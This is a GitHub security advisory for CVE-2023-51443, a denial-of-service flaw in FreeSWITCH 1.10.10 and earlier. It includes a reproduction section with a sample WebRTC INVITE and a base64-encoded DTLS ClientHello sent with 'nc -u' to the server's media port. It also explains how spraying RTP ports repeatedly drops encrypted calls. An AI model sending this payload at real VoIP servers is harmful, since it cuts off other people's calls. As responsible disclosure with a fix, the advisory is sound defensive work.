Skip to content

FreeSWITCH susceptible to Denial of Service via DTLS Hello packets during call initiation

High
andywolk published GHSA-39gv-hq72-j6m6 Dec 23, 2023

Package

FreeSWITCH (C)

Affected versions

<= 1.10.10

Patched versions

>= 1.10.11

Description

TL;DR

When handling DTLS-SRTP for media setup, FreeSWITCH is susceptible to Denial of Service due to a race condition in the hello handshake phase of the DTLS protocol. This attack can be done continuously, thus denying new DTLS-SRTP encrypted calls during the attack.

Description

Our research has shown that key establishment for Secure Real-time Transport Protocol (SRTP) using Datagram Transport Layer Security Extension (DTLS)1 is susceptible to a Denial of Service attack due to a race condition. If an attacker manages to send a ClientHello DTLS message with an invalid CipherSuite (such as TLS_NULL_WITH_NULL_NULL) to the port on the FreeSWITCH server that is expecting packets from the caller, a DTLS error is generated. This results in the media session being torn down, which is followed by teardown at signaling (SIP) level too.

This behavior was tested against FreeSWITCH version 1.10.10, which was found to be vulnerable to this issue.

The following sequence diagram shows the normal flow (i.e. no attack) involving SIP and DTLS messages between a UAC (the Caller) and an FreeSWITCH server capable of handling WebRTC calls.

Diagram showing a call setup against FreeSWITCH that uses SIP and DTLS:
Diagram showing a call setup against FreeSWITCH that uses SIP and DTLS

In a controlled experiment, it was observed that when the Attacker sent a DTLS ClientHello to FreeSWITCH's media port from a different IP and port, FreeSWITCH responded by sending a DTLS Alert to the Caller. Additionally, FreeSWITCH terminated the SIP call by sending a BYE message to the Caller.

Diagram showing a call setup against FreeSWITCH that fails due to an attacker controlled DTLS ClientHello

During a real attack, the attacker would spray a vulnerable FreeSWITCH server with DTLS ClientHello messages. The attacker would typically target the range of UDP ports allocated for RTP. When the ClientHello message from the Attacker wins the race against an expected ClientHello from the Caller, the call terminates, resulting in Denial of Service.

Impact

Abuse of this vulnerability may lead to a massive Denial of Service on vulnerable FreeSWITCH servers for calls that rely on DTLS-SRTP.

How to reproduce the issue

  1. Prepare a FreeSWITCH server with an extension configured to handle WebRTC

  2. Send an INVITE message to the target server with WebRTC SDP:

    INVITE sip:[email protected] SIP/2.0
    Via: SIP/2.0/WSS 192.168.1.202:36742;rport=36742;branch=z9hG4bK-jQcnXJadB2VGfGmQ
    Max-Forwards: 70
    From: <sip:[email protected]>;tag=L9kc5NfpYG1u67cT
    To: <sip:[email protected]>
    Contact: <sip:[email protected]>
    Call-ID: DzGnBLt0z9SK3MC0
    CSeq: 5 INVITE
    Content-Type: application/sdp
    Content-Length: 385
    
    v=0
    o=- 1695296331 1695296331 IN IP4 192.168.1.202
    s=-
    t=0 0
    c=IN IP4 192.168.1.202
    m=audio 45825 UDP/TLS/RTP/SAVPF 0 8 101
    a=setup:active
    a=fingerprint:sha-256 49:05:98:B2:15:43:1C:9C:4F:29:07:60:F8:63:77:16:80:F9:44:C0:97:8E:E5:48:D6:71:B4:03:10:85:D6:E3
    a=rtpmap:0 PCMU/8000/1
    a=rtpmap:8 PCMA/8000/1
    a=rtpmap:101 telephone-event/8000
    a=rtcp-mux
    a=rtcprsize
    a=sendrecv
    
  3. Note FreeSWITCH's media port and IP values, which will be used as the <freeswitch-ip> and <media-port> parameters by the Attacker

  4. Send a DTLS ClientHello message from a (attacker-controlled) host, which is different from the Caller but has network access to the FreeSWITCH server

    CLIENT_HELLO="Fv7/AAAAAAAAAAAAfAEAAHAAAAAAAAAAcP79AAA" 
    CLIENT_HELLO="${CLIENT_HELLO}AAG4HCVaUNVbYVmxuqdn2WyCgtTijhZ+WheP/+H"
    CLIENT_HELLO="${CLIENT_HELLO}4AAAACAAABAABEABcAAP8BAAEAAAoACAAGAB0AF"
    CLIENT_HELLO="${CLIENT_HELLO}wAYAAsAAgEAACMAAAANABQAEgQDCAQEAQUDCAUF"
    CLIENT_HELLO="${CLIENT_HELLO}AQgGBgECAQAOAAkABgABAAgABwA="
    echo -n "${CLIENT_HELLO}" | base64 --decode | nc -u <freeswitch-ip> <media-port>
  5. Observe that the Caller received a DTLS Alert message and a SIP BYE message on its signaling channel

Note that the above steps are used to reliably reproduce the vulnerability. In case of a real attack, the attacker simply has to spray the FreeSWITCH server with DTLS messages.

Solution and recommendations

To address this vulnerability, upgrade FreeSWITCH to the latest version which includes the security fix. The solution implemented is to drop all packets from addresses that have not been validated by an ICE check.

About Enable Security

Enable Security develops offensive security tools and provides quality penetration testing to help protect your real-time communications systems against attack.

Disclaimer

The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.

Disclosure policy

This report is subject to Enable Security's vulnerability disclosure policy which can be found at https://github.com/EnableSecurity/Vulnerability-Disclosure-Policy.

Footnotes

  1. Datagram Transport Layer Security (DTLS) Extension to Establish Keys for the Secure Real-time Transport Protocol (SRTP) https://datatracker.ietf.org/doc/html/rfc5764

Severity

High

CVSS overall score

This score calculates overall vulnerability severity from 0 to 10 and is based on the Common Vulnerability Scoring System (CVSS).
/ 10

CVSS v3 base metrics

Attack vector
Network
Attack complexity
Low
Privileges required
None
User interaction
None
Scope
Unchanged
Confidentiality
None
Integrity
None
Availability
High

CVSS v3 base metrics

Attack vector: More severe the more the remote (logically and physically) an attacker can be in order to exploit the vulnerability.
Attack complexity: More severe for the least complex attacks.
Privileges required: More severe if no privileges are required.
User interaction: More severe when no user interaction is required.
Scope: More severe when a scope change occurs, e.g. one vulnerable component impacts resources in components beyond its security scope.
Confidentiality: More severe when loss of data confidentiality is highest, measuring the level of data access available to an unauthorized user.
Integrity: More severe when loss of data integrity is the highest, measuring the consequence of data modification possible by an unauthorized user.
Availability: More severe when the loss of impacted component availability is highest.
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CVE ID

CVE-2023-51443

Weaknesses

Credits